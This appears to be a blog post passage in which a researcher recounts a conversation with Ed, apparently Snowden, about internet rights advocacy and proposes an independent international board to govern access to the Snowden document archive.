We spoke about the Internet rights community, and the challenges of extending the values of that community to the broader public in a context where big data and state surveillance are overwhelmingly dominating.  I made the case for the value of evidence-based, mixed methods University research of the sort that Citizen Lab does to bring transparency and support human rights advocacy.  I described the various fellowship opportunities, and even recommended Ed apply for one as a remote fellow. 🙂

We also spoke about the status of the Snowden disclosures moving forward.  It is clear Ed thought carefully about how best to avoid prejudice concerning the analysis of the documents. Handing them over to third parties makes sense.  But now, the documents are largely in the possession of a single media organization and the process around access to them for outside interested parties is opaque and lacking in explicit rules that we can all acknowledge.  Opening the entire cache up to the public, on the other hand, would be irresponsible since there is still sensitive information in them that could put lives at risk.

A different model I proposed is to create a respected international independent advisory board that would oversee and adjudicate applications to the archives from journalists and researchers. Ed responded that discussions had been held with a University about taking the documents, but the University was naturally concerned about the liabilities of handling them. But I believe that is confusing things. Here we need to separate the physical location of the documents from the process of how to get access to them.  It does not matter where the documents are archived — whether that be in one or several locations — as long as they are secure.  What matters more is the process by which decisions are made as to who gets access to them.  Right now, it’s a bit of a mystery and based largely on personal connections revolving around one or two journalists and a few editors of a private company.  Moving forward, that needs to change.  It’s a matter of global public interest.

Thanks to Access Now for archiving it here: https://www.youtube.com/watch?v=yGDqXokPGiE